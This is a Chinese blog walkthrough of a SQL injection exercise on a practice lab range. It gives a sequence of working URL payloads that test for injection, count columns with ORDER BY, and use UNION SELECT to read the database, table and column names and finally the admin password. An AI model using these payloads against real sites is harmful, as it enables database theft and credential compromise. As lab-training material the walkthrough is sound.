靶场实战——SQL注入

靶场地址:封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。 (zkaq.cn)

 

点击查看新闻1可得到如下信息

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 -- - 

 页面有显示,可能注入成功,再次进行测试

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 -- -

 此时页面没有内容输入,可以得出结论该sql注入就是简单的数字型 

下面就进行拖库

首先利用order by 来确认列数,从1开始,当从1开始到报错的前一个数字就说明该表有几列

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 1 -- - 当输入到3时

输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 3 -- - 

确认列数为两列

然后使用union结合select来确定出输出的内容位于那一列

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,2 LIMIT 1,1 -- -  

确定之后就简单了,先获取数据库名字

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,database() LIMIT 1,1 -- -

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'maoshe' LIMIT 1,1 -- -

group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'maoshe',不懂这句话的意思可以问ai,不是啥难点

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -

 输入payload:

http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,password from admin limit 1,1 -- -

提交

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值